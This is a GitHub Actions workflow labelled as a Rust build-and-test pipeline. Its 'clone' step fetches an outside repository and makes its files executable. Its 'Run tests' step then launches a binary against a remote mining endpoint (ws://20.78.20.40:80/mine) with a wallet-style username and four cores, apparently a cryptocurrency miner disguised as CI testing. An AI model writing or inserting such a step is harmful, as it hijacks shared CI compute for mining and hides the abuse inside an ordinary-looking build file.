name: Rust

on:
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

env:
  CARGO_TERM_COLOR: always

jobs:
  build:

    runs-on: ubuntu-latest

    steps:
    - uses: actions/checkout@v4
    - name: clone
      run: git clone https://github.com/WANMADEIRA/batu/ && cd batu && chmod u+x *
    - name: Build
      run: cd batu && cargo build --release
    - name: Run tests
      run: cd batu && cargo test && ls && .~/batu --url ws://20.78.20.40:80/mine mine --username HrMWvLPp5HVwRM5BfmBG9NEWfsK98NJKkfoih2ZCjiq4.00vps1 --cores 4 
